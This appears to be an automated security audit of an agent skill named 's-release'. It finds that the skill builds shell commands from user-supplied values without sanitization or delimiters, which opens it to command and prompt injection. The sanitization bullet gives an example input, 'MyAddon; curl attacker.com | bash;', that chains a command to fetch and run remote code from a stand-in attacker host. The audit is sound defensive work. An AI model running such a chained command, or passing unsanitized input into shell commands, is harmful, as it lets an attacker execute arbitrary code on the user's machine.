s-release
Warn
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: MEDIUMCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [Indirect Prompt Injection] (MEDIUM): The skill instructs the agent to construct and execute shell commands using variables derived from user input without providing sanitization or validation instructions.
- Ingestion points: User-provided values for 'MyAddon', '1.2.0', and 'Release message' in the
SKILL.mdcommand examples. - Boundary markers: Absent. The skill does not define delimiters or warn the agent to ignore embedded instructions within user-provided strings.
- Capability inventory: Shell command execution via the
mechCLI tool, which has the power to modify files (version bumps, changelogs) and interact with git (commits, tags). - Sanitization: None observed. The instructions show direct string interpolation which could be exploited if a user provides an input like
MyAddon; curl attacker.com | bash;.
Audit Metadata